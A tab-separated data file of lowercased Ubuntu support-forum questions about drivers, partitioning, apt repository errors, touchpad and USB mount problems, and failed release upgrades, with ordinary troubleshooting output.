510955	accessing applications	color me stupid , but i 've read and tried to execute the suggestions here for this issue and have failed . all i want to do is find and then execute the applications available , the ones i see are already installed . i get it that there are two ways to do this , but i need a simpler instruction than the ones i 've seen here -- no offence to the generous souls who provided that advice . to be specific , i 'd like to use audio recorder . i know it 's installed because i can bring up the window that shows me that . but how do i get it to run ? and how can i do the same for the other apps that are also installed ? thanks .
510959	show a dialog box after a period of inactivity	i am soon going to have to migrate an entire computer lab ( about 50 pcs ) from windows 7 to ubuntu 14.04 lts . as it 's an university , 99 % of the time ( if not 100 % ) it will be used by students . there is not a central database of user accounts and credentials , so each pc will have only two accounts , admin and guest , with the latter configured to autologin ( besides some customization as per this tutorial ) . when the pcs are turned on , and the guest account logs in automaticcaly , the first thing shown after the window manager is loaded is this dialog box : however , there 's two problems : the very first person who sits at the computer at 9am will see the dialog box , click ok , use the pc , leave , not ending the session or locking the screen ( because users ) , and the second user onwards wo n't see the message there is more relevant information that i 'd like to convey for the lab users ( lab rules , etc ) . so , with this scenario in mind , what i want to achieve is having a dialog box really similar to this one ( but with a different text , set by me ) to popup whenever a computer is n't used for , say , 15 minutes . ( for the purpose of this question , let 's assume `` not used '' means no keyboard or mouse activity ) . i have been directed to how does ubuntu determine inactivity before suspending ? and how can a script detect a user 's idle time ? and use ruby or sheel scripts , but i do n't know how to code . is there a simpler way to achieve what i need ?
510967	changing the applications launched by special keyboard buttons	i 'm running 14.04 with cinnamon . when i press the `` my computer '' button on my dell keyboard , it launches the vanilla gnome files file manager . i want to make it launch cinnamon 's nemo . i 'm finding a lot of answers about what the common keyboard shortcuts are , but not how to change what app responds to them .
510970	ubuntu-device-flash fails nexus 4	phone status : ubuntu touch was installed , but i have to reinstall it because the ubuntu install is broken . im unable to install ubuntu touch/phone a second time , it always errors out with the following output : $ sudo ubuntu-device-flash -- channel=devel -- bootstrap 2014/08/13 20:41:23 expecting the device to be in the bootloader ... waiting 2014/08/13 20:41:23 device is |mako| 2014/08/13 20:41:23 flashing version 179 from devel channel and server https : //system-image.ubuntu.com to device mako 2014/08/13 20:41:23 ubuntu-touch/utopic is a channel alias to devel /home/k1773r/.cache/ubuntuimages/ubuntu-touch/devel/mako/version-179.tar.xz /home/k1773r/.cache/ubuntuimages/pool/device-97360477eff33a9f63eaf8d65b8bc174344963ee793f2eb99107a81bab62262d.tar.xz 2014/08/13 20:42:46 can not cleanup /cache/recovery/ to ensure clean deploymentexit status 255 i did wipe the /cache partition with the `` ubuntu touch recovery '' . this didnt help , so i did it with fastboot . unfortunately neither this solved my issue . it is possible to reinstall android , but not ubuntu touch . while in recovery , `` adb devices '' only spits out ? and `` no permissions '' . how can i solve this issue and get ubuntu touch running again ?
510972	graphics drivers ?	i have a radeon r9 270 , where can i get the proper graphics drivers for this card ? i 've tried a few graphics drivers already but none of them seem to have any affect towards performance and compatibility , specifically with games .
510974	when i open rosegarden something strange happens	okay . now i 'm listening to some music on audacity . then i open up rosegarden . audacity just `` stops '' . i also think all other sounds do n't come out anymore . anyway ; i took some time fooling around with its settings and fixed things by going to settings , audio , audio output , jack output . now audacity works again . ... what happened ? i do n't understand anything . also i noticed a very strange think ; the music itself is better with this `` jack output '' . can anyone explain anything ?
510975	adding another partition to 14.04 - what mount-point/settings needed ?	firstly sorry if this is a bit too detailed for this kind of question but i fear not telling you enough to be able to help me ! so , i have a duel boot ( uefi ) laptop which had win7 on it which i shrank and installed extra partitions ( gpt ) and then added ubuntu . i 'm aiming not to return to win7 other than for a few bits i need for work but when i started adding my favourite games with wine i found i did n't have enough space on my partitions but again , i do actually have some free space on the drive , which parted table from is at the bottom of this post . between partition 5 ( swap ) and 12 ( some random reset stuff that came with the laptop and i do want rid of eventually but not yet ) , is , according to disks , 50gb free-space . i want to make partition ( s ) out of this that i can use but i 'm not entirely clear re : what mount-point and so on to use for this extra partition . i 've never gone 'outside of the box ' in this way before - i 've only ever stuck to normal partition structures . i want wine to be able to access it , obviously , and want to run games from it , basically . my existing structure is below - 6 = root , 7 = /boot , 8 = /usr , 9 = /var , 10 = /tmp , 11 = /home , 12 = swap . i do n't really want to do a clean install and just make /usr bigger - i 'd like to just add another partition but i do n't know what to call it etc - can someone please advise what is best to do in this circumstance ? thanks r partition table : gpt number start end size file system name flags 1 1049kb 420mb 419mb ntfs basic data partition hidden , diag 2 420mb 735mb 315mb fat32 efi system partition boot 3 735mb 869mb 134mb microsoft reserved partition msftres 4 869mb 361gb 360gb ntfs basic data partition msftdata 6 361gb 377gb 16.0gb ext4 7 377gb 377gb 300mb ext4 8 377gb 384gb 7000mb ext4 9 384gb 397gb 13.0gb ext4 10 397gb 398gb 500mb ext4 11 398gb 405gb 7000mb ext4 12 405gb 416gb 11.0gb linux-swap ( v1 ) 5 466gb 500gb 34.1gb ntfs basic data partition hidden , diag
510978	firefox - how to avoid duplicate file data download when using `` save page as '' ?	i find that i am accessing many pdf files which are downloaded for reading into firefox . but when i go to save these files using `` save page as '' , firefox repeats the data download . as the files can be big , this is tiresome . is there a way to avoid this duplication of file data download ?
510982	z97 motherboard support on ubuntu 14.04 ( fan workarounds ? )	i 'm extraordinarily new to ubuntu ( and linux in general ) so any and all help will be appreciated . i 've built a pc with an asrock z97 extreme4 mobo and everything runs well except that the cpu fan does n't work at all . i 'm running the 14.04 lts . any idea when we 'll get full driver support for the z97 mobos ? if yes , how can i keep track of related updates as they come ? also , if anyone knows of a workaround that gets that fan going i would greatly appreciate it . i do n't even mind if it 's going at max all the time , i 'd prefer that to no cooling on my cpu at all . again , any help is appreciated !
510987	dedicated amd graphics card not detected	i 'm using samsung 3rd gen intel i5 laptop with radeon hd8750 and intel hd4000 , with ubuntu 14.04 my laptop is currently using integrated graphics card only . it does n't even mention about dedicated graphics card . i think both the graphics card are switched on , that 's why my laptop is consuming more power and getting really hot . on my earlier laptop i used bumblebee for this switching between the 2 graphics card . is there any similar tool available for ati , or is it possible to disable one of the card ( no such option is provided in boot menu by samsung ) . please suggest something to resolve this issue . i can post the output of any command if you need it . lspci -v 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) subsystem : samsung electronics co ltd device c706 flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : f7d00000-f7dfffff prefetchable memory behind bridge : 00000000e0000000-00000000efffffff capabilities : < access denied > kernel driver in use : pcieport 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : samsung electronics co ltd device c706 flags : bus master , fast devsel , latency 0 , irq 47 memory at f7800000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : samsung electronics co ltd device c706 flags : bus master , medium devsel , latency 0 , irq 43 memory at f7e00000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) subsystem : samsung electronics co ltd device c706 flags : bus master , fast devsel , latency 0 , irq 46 memory at f7e1a000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei_me 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : samsung electronics co ltd device c706 flags : bus master , medium devsel , latency 0 , irq 16 memory at f7e18000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : samsung electronics co ltd device c706 flags : bus master , fast devsel , latency 0 , irq 48 memory at f7e10000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 memory behind bridge : f7c00000-f7cfffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff prefetchable memory behind bridge : 00000000f0000000-00000000f00fffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : samsung electronics co ltd device c706 flags : bus master , medium devsel , latency 0 , irq 23 memory at f7e17000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) subsystem : samsung electronics co ltd device c706 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : samsung electronics co ltd device c706 flags : bus master , 66mhz , medium devsel , latency 0 , irq 45 i/o ports at f0b0 [ size=8 ] i/o ports at f0a0 [ size=4 ] i/o ports at f090 [ size=8 ] i/o ports at f080 [ size=4 ] i/o ports at f060 [ size=32 ] memory at f7e16000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) subsystem : samsung electronics co ltd device c706 flags : medium devsel , irq 11 memory at f7e15000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at f040 [ size=32 ] 01:00.0 display controller : advanced micro devices , inc. [ amd/ati ] mars [ radeon hd 8670a/8670m/8750m ] subsystem : samsung electronics co ltd device c706 flags : bus master , fast devsel , latency 0 , irq 49 memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at f7d00000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at e000 [ size=256 ] expansion rom at f7d40000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : radeon 02:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) subsystem : samsung electronics co ltd device 4105 flags : bus master , fast devsel , latency 0 , irq 16 memory at f7c00000 ( 64-bit , non-prefetchable ) [ size=512k ] expansion rom at f7c80000 [ disabled ] [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) subsystem : samsung electronics co ltd device c706 flags : bus master , fast devsel , latency 0 , irq 44 i/o ports at d000 [ size=256 ] memory at f0004000 ( 64-bit , prefetchable ) [ size=4k ] memory at f0000000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 thanks for the help in advance !
510988	today my left-mouse button stops functioning normaly	i 'm using 14.04 lts , and today it does n't responds on certain places on the screen . it looks like the focus on the windows changes without seeing it . with alt-tab sometimes it starts working . i do n't know what i did to cause this miss behavior . what can i do ? to get this solved . with kind regards andre
510993	upgrade from 12.04 lts to 14.04 lts crashed , now i have no access to my ubuntu system	i am a linux novice and do not understand quite what is happening . the update manager in my 12.04 installation offered me the upgrade to 14.04 which i decided to do . so i clicked on the link and all seemed well for almost 3 hours . during the 'upgrade packages ' stage my system crashed and powered off without shutting down . i have tried everything i can think off to get back in to my ubuntu system including the dpkg recovery for the new version , boot to old version , dpkg recovery for the old version , and even using my original dvd that i saved the image onto for the first install of 12.04 . nothing is giving me access to my system so that i can repair it and get back to work though . is there a page somewhere in the help pages that i have missed on what my next steps should be ? if i created a bootable usb drive copy of 14.04 would that help , and if so how can i do this ? at the moment i can not access any of my data which i need to run my business and this is stopping me from working , costing me customers , and money is pouring down the drain . please help soon as i am desperate .
510995	how to solve problem with repositories and update information is outdated message 14.04	i am still new to linux and currently using 14.04 and not sure what to do to solve this situation . the problem arose as i was just trying to install spotify following this guide and i found myself receiving the following messages after the sudo apt-get update -qq command w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/quantal/main/binary-amd64/packages 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/quantal/universe/binary-amd64/packages 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/quantal/universe/binary-i386/packages 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch http : //uk.archive.ubuntu.com/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found [ ip : 194.169.254.10 80 ] w : failed to fetch http : //uk.archive.ubuntu.com/ubuntu/dists/quantal/universe/binary-amd64/packages 404 not found [ ip : 194.169.254.10 80 ] w : failed to fetch http : //uk.archive.ubuntu.com/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 194.169.254.10 80 ] w : failed to fetch http : //uk.archive.ubuntu.com/ubuntu/dists/quantal/universe/binary-i386/packages 404 not found [ ip : 194.169.254.10 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . and surely enough these repeated even after typing the sudo apt-get install spotify-client . i had not encountered these so i followed some guidelines and tried sudo apt-get upgrade followed by sudo apt-get update but no success . here is a copy of my /etc/apt/sources.list # deb cdrom : [ ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) ] / trusty main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ trusty main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ trusty main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ trusty-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ trusty-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ trusty universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ trusty universe deb http : //gb.archive.ubuntu.com/ubuntu/ trusty-updates universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ trusty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //gb.archive.ubuntu.com/ubuntu/ trusty multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ trusty multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ trusty-updates multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ trusty-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ trusty-security main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ trusty-security main restricted deb http : //gb.archive.ubuntu.com/ubuntu/ trusty-security universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ trusty-security universe deb http : //gb.archive.ubuntu.com/ubuntu/ trusty-security multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ trusty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu trusty partner deb-src http : //archive.canonical.com/ubuntu trusty partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //extras.ubuntu.com/ubuntu trusty main # # multiarch sources deb [ arch=amd64 , i386 ] http : //uk.archive.ubuntu.com/ubuntu/ quantal main universe deb http : //ports.ubuntu.com/ubuntu-ports quantal main universe deb http : //repository.spotify.com stable non-free # deb-src http : //repository.spotify.com stable non-free at the same time i also have the the update information is outdated notification in the top right corner . i am not sure where to go from here .
510997	which hidden files in the /home/user folder control the desktop ?	the background story : the other day my ( l ) ubuntu offered me to upgrade from 12.04 lts to 14.04 lts , which i gladly accepted . at the end of the evening , i started the update out of the update manager , got up and went to bed , not noticing that the laptop 's power was due to run out apparantly before the update had finished . after swearing loudly the next day because the pc would n't boot , i downloaded a lubuntu 14.04 lts live cd , booted from that , backed up my complete personal folder ( inluding the hidden files/folders ) ( excluding the 39 gigs of ~/music i had safe on my other pc ) and reinstalled lubuntu 14.04 from scratch . after the reinstallation , i installed quite a few programs i knew i would need/want ( skype , mumble , pcsx , vlc and libreoffice , just to name a few ) , and twiddled with a few of the system settings to create a nicer looking system . today , i recopied the entirety of my personal folder back onto that laptop to ( hopefully ) restore all settings , save a few folders/files which sounded like i would n't need them . logged off , tried logging back on , and my desktop is empty . yes , it 's literally an empty desktop . no files ( there should be two ) , standard background , no panel thingy ( what i would call task bar in windows ) . there 's a mouse i can move . if i right-click on the background , i get a menu out of which i can open a console . ( out of the console i can open pretty much everything i 've tried so far , but it 's kinda … unintuitive ; ) ) even though the right-click menu offers 'system - > desktop settings ' , no desktop settings window will physically open . i have a little script that should change the desktop background once every 30 mins . attempting to start that script results in an error message saying the desktop is not active . which prompts my questions : which ( required ) file ( s ) and/or folder ( s ) have i most likely overwritten ( and probably rendered unuseable ? ) when porting the complete user folder onto the newer version ? how can i get a working desktop back ? are there any other hidden traps i might stuble into in the near future ? thanks for your help and apologies if there are answers around here somewhere that i was too stupid to find !
510998	sound distortion in ubuntu 14.04 on dell xps l502x jbl speakers	i noticed that someone posted this question before and it was n't answered . sound distortion in ubuntu 14.04 i have had the same issue for months now as well . yes , months . seems like dell xps 's that are out of warranty are doomed by this . basically , i too have ubuntu 14.04 installed on my dell xps 15 ( l502x ) and to quote the previous question : i recently installed ubuntu 14.04 on my dell xps 15 ( l502x ) . previously i had ubuntu 12.04 installed on the laptop along with windows 8.1 dual boot . the sound worked perfectly fine in ubuntu 12.04 and is working fine in windows 8.1 . of late , i have been experiencing sound distortion coming from the subwoofer at moderately high volume levels . at the same level i am unable to reproduce the same effect in windows 8.1 . also , i did a clean install of ubuntu 14.04 over 12.04 . can anyone please confirm this and help me with this ? thanks i realize that this is a duplicate question but i cant pose in the other question since i have no answer and am not allowed to post in the comments since i do n't have the reputation yet . hopefully , someone can answer this .
510999	number keys wont function	acer aspire one model kav60 , with windows xp , number lock key functions ( light turns on and off ) but it wont type numbers . i have tried factory restore , reinstalling driver and using on screen keyboard . none worked .
511000	xfce indicator applet completely messed up	i recently had to reinstall xubuntu 14.04 after windows wiped it out . after a mildly painful ( mostly caused by the installer seeming a lot more confused than usual ) installation process , i was up and running . everything was doing just fine until i rebooted my computer . now , my indicator applet looks like this : i did n't change anything before this happened , other than install a few pieces of unrelated software ( chrome , skype , kdenlive , komodo edit and hotot ) . i 've had problems with the indicator applet before , but never to this extreme . anyone have any advice ? note : i 've seen this question , but the answer did not help me .
511006	xubuntu 14.04 automount usb stick as root	i tried to read up a bunch of things on that topic , but nothing so far solved my problem . everytime i plug-in a usb flash drive it gets automounted to /media/user/ as root . currently it 's a ext4 drive . is there any way to automount the stick with the permissions of the current user , instead of root ? here is the output of `` ls -al '' on /media/user/ : user @ xubuntu : ~ $ ls -al /media/user/ total 12 drwxr-x -- -+ 3 root root 4096 aug 13 17:03 . drwxr-xr-x 3 root root 4096 aug 6 10:11 .. drwxr-xr-x 3 root root 4096 aug 13 16:25 usbtest this is some kind of annoying , since nautilus opens the windows automatically and says `` device automounted '' but i am not able to do things like e.g . right click - > create folder . thanks a lot ! update so , some more remarks : when i format the drive to ntfs and plug it in , it allows me to write to it . strange .
511010	ca n't toggle touchpad with xinput after ubuntu update	i have encountered a strange malfunction of my touchpad and xinput . after one the latest updates ( timeframe 07/11/14 to 07/14/14 ) my touchpad stopped being toggleable when handled with xinput . system : ubuntu 14.04 , kernel 3.13.0-33 lenovo yoga 13 touchpaddevice : synps/2 synaptics touchpad output of xinput list virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ elan touchscreen id=9 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ lenovo easycamera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] what i did : 1 ) booted system -- > touchpad works 2 ) checked properties of xinput with xinput -- watch-props 12 device 'synps/2 synaptics touchpad ' : device enabled ( 135 ) : 1 coordinate transformation matrix ( 137 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 268 ) : 1 device accel constant deceleration ( 269 ) : 2.500000 device accel adaptive deceleration ( 270 ) : 1.000000 device accel velocity scaling ( 271 ) : 12.500000 synaptics edges ( 292 ) : 1765 , 5371 , 1637 , 4453 synaptics finger ( 293 ) : 25 , 30 , 0 synaptics tap time ( 294 ) : 180 synaptics tap move ( 295 ) : 234 synaptics tap durations ( 296 ) : 180 , 180 , 100 synaptics clickpad ( 297 ) : 1 synaptics middle button timeout ( 298 ) : 0 synaptics two-finger pressure ( 299 ) : 282 synaptics two-finger width ( 300 ) : 7 synaptics scrolling distance ( 301 ) : 106 , 106 synaptics edge scrolling ( 302 ) : 0 , 0 , 0 synaptics two-finger scrolling ( 303 ) : 1 , 1 synaptics move speed ( 304 ) : 1.000000 , 1.750000 , 0.037601 , 0.000000 synaptics off ( 305 ) : 0 synaptics locked drags ( 306 ) : 0 synaptics locked drags timeout ( 307 ) : 5000 synaptics tap action ( 308 ) : 2 , 3 , 0 , 0 , 1 , 3 , 0 synaptics click action ( 309 ) : 1 , 3 , 2 synaptics circular scrolling ( 310 ) : 0 synaptics circular scrolling distance ( 311 ) : 0.100000 synaptics circular scrolling trigger ( 312 ) : 0 synaptics palm detection ( 313 ) : 0 synaptics palm dimensions ( 314 ) : 10 , 200 synaptics coasting speed ( 315 ) : 20.000000 , 50.000000 synaptics pressure motion ( 316 ) : 30 , 160 synaptics pressure motion factor ( 317 ) : 1.000000 , 1.000000 synaptics grab event device ( 318 ) : 1 synaptics gestures ( 319 ) : 1 synaptics capabilities ( 320 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 synaptics pad resolution ( 321 ) : 52 , 42 synaptics area ( 322 ) : 0 , 0 , 0 , 0 synaptics soft button areas ( 323 ) : 3568 , 0 , 4092 , 0 , 0 , 0 , 0 , 0 synaptics noise cancellation ( 324 ) : 8 , 8 device product id ( 255 ) : 2 , 7 device node ( 256 ) : `` /dev/input/event4 '' 3 ) executed xinput set-prop 12 `` device enabled '' 0 -- > touchpad stopped working 4 ) event updated under xinput -- watch-props 12 property 'device enabled ' changed . device enabled ( 135 ) : 0 property 'device enabled ' changed . device enabled ( 135 ) : 0 note : event was reported twice ... dunno why 5 ) executed xinput set-prop 12 `` device enabled '' 1 6 ) event updated under xinput -- watch-props 12 property 'device enabled ' changed . device enabled ( 135 ) : 1 but : touchpad is not reacting or resuming his function in any way . complete re-run of xinput -- watch-props 12 produces device 'synps/2 synaptics touchpad ' : device enabled ( 135 ) : 1 coordinate transformation matrix ( 137 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 268 ) : 1 device accel constant deceleration ( 269 ) : 2.500000 device accel adaptive deceleration ( 270 ) : 1.000000 device accel velocity scaling ( 271 ) : 12.500000 synaptics edges ( 292 ) : 1765 , 5371 , 1637 , 4453 synaptics finger ( 293 ) : 25 , 30 , 0 synaptics tap time ( 294 ) : 180 synaptics tap move ( 295 ) : 234 synaptics tap durations ( 296 ) : 180 , 180 , 100 synaptics clickpad ( 297 ) : 1 synaptics middle button timeout ( 298 ) : 0 synaptics two-finger pressure ( 299 ) : 282 synaptics two-finger width ( 300 ) : 7 synaptics scrolling distance ( 301 ) : 106 , 106 synaptics edge scrolling ( 302 ) : 0 , 0 , 0 synaptics two-finger scrolling ( 303 ) : 1 , 1 synaptics move speed ( 304 ) : 1.000000 , 1.750000 , 0.037601 , 0.000000 synaptics off ( 305 ) : 0 synaptics locked drags ( 306 ) : 0 synaptics locked drags timeout ( 307 ) : 5000 synaptics tap action ( 308 ) : 2 , 3 , 0 , 0 , 1 , 3 , 0 synaptics click action ( 309 ) : 1 , 3 , 2 synaptics circular scrolling ( 310 ) : 0 synaptics circular scrolling distance ( 311 ) : 0.100000 synaptics circular scrolling trigger ( 312 ) : 0 synaptics palm detection ( 313 ) : 0 synaptics palm dimensions ( 314 ) : 10 , 200 synaptics coasting speed ( 315 ) : 20.000000 , 50.000000 synaptics pressure motion ( 316 ) : 30 , 160 synaptics pressure motion factor ( 317 ) : 1.000000 , 1.000000 synaptics grab event device ( 318 ) : 1 synaptics gestures ( 319 ) : 1 synaptics capabilities ( 320 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 synaptics pad resolution ( 321 ) : 52 , 42 synaptics area ( 322 ) : 0 , 0 , 0 , 0 synaptics soft button areas ( 323 ) : 3568 , 0 , 4092 , 0 , 0 , 0 , 0 , 0 synaptics noise cancellation ( 324 ) : 8 , 8 device product id ( 255 ) : 2 , 7 device node ( 256 ) : `` /dev/input/event4 '' a check with xinput -- test 12 is reporting no events at all . so ... long story short : the device has the same values like before.. but is not working any more . i also checked synclient -l but the only important value `` touchpadoff '' is set on `` 0 '' i also disabled the `` disable while typing '' -option in gnome-control-center to avoid any interference . and i checked the enable-disable toggling with synclient touchpadoff=0 and synclient touchpadoff=1 which works flawless . and finally i tried to toggle the touchpad with the neat little button under `` mouse/touchpad '' in `` gnome-control-center '' that , as it creates the same events as i did , results in the same xiput events and outcome . question is : is there any other value of any other application that is used/responsible for the on/off-toggling and .. if there is ... how can i track it down ? oh .. ah.. fyi : touchpad resumes his work after relogging . thanks a lot for reading this far.. and in advance for your help an support .
511011	how to edit grubenv manually ?	i remember there is a command to manually edit grubenv , but i forget and can not find it . anyone knows ? thanks a lot .
511020	spotify recording alternative wanted	is there a option to cut out music while listening to spotify . it is legal to record the internet radio , so i search for a tool like the windows tool , ,spotify recorder ``
511024	how can i access the internet ?	my boyfriend installed ubuntu on my computer but i can not open the web browser to get to the internet , because i ca n't find the blue e icon in the main screen . i know that the internet connection works because i am surfing right now from my computer , but i can only do this because the browser was left open . how do i launch a browser so i can see web pages ?
511025	ubuntu instalalion fail fuel deployment on dell 1950	i am trying to use mirantis fuel to deploy openstack and encounter problem with ubuntu installation , i am using dell 1950 with no raid set so the system detect 3 attached disk , upon finishing installation , the system reboot and got stuck on scsi attached , i had tried many different configuration raid0 and raid1 all stuck at the same spot . i could deploy other servers using r710 , any solution ?
511027	blueman not working for internet sharing	i want to share my pc internet to my phone . installed blueman . it works fine for file transfers but when i try to start nap service , it says `` dnsmasq failed to start '' what is the problem ? ! i 'm on lenovo s400 running ubuntu 14.04
511028	dual boot ubuntu in windows 8 oem system when usb is not detected	ok ... so i trying to dual boot ubuntu 14.04 64-bit and windows 8.1 asus oem on my laptop , and it does have uefi bios . so , in accordance with the instructions , i disabled fast startup , secureboot , but i do not believe legacy boot is an option in my bios ( i will double check with asus support ) . so after i did that , i used unetbootin to burn a 14.04 64 bit iso image onto an 8 gb flash drive via the usb 3 port ( have also tried usb 2.0 ) . i go into advanced startup options from in windows and choose boot a device , but the only option there is `` ubuntu '' from my previous failed installation ( which i later removed ) . the usb does not appear in that menu , nor in bios in the boot order menu ( only the ubuntu entry again ) , and i am not sure what to do . my old laptop also does not boot off usb anymore , so must i go with virtualbox ? thank you all !
511031	how do i get gnome notifactions back to appearing as `` bubbles '' ?	i am currently running ubuntu 12.04 lts with gnome 3.5.4 . ordinarily , my notifications look like this : ( not mine , but identical . a sort of pop-up in the upper-right corner of the screen ) . after rebooting from the last update my notifications began to look like this : that is located at the bottom of the screen . i tried re-installing notify-osd and searched around for solutions i failed to find anything that works successfully . any help is appreciated .
511032	upgrade to 14.04 tells me , `` download failed - check your internet connection ''	i have a dell e6410 that i put a new hard drive into and installed ubuntu 12.04 on it . it works great except for some plugins and it will not allow me to upgrade to the latest ubuntu . it keeps telling me that the down load failed and to check my internet connection . this i have checked and double checked . is there an easy fix for this , as i have already confused myself with the bios updater ? thanks in advance !
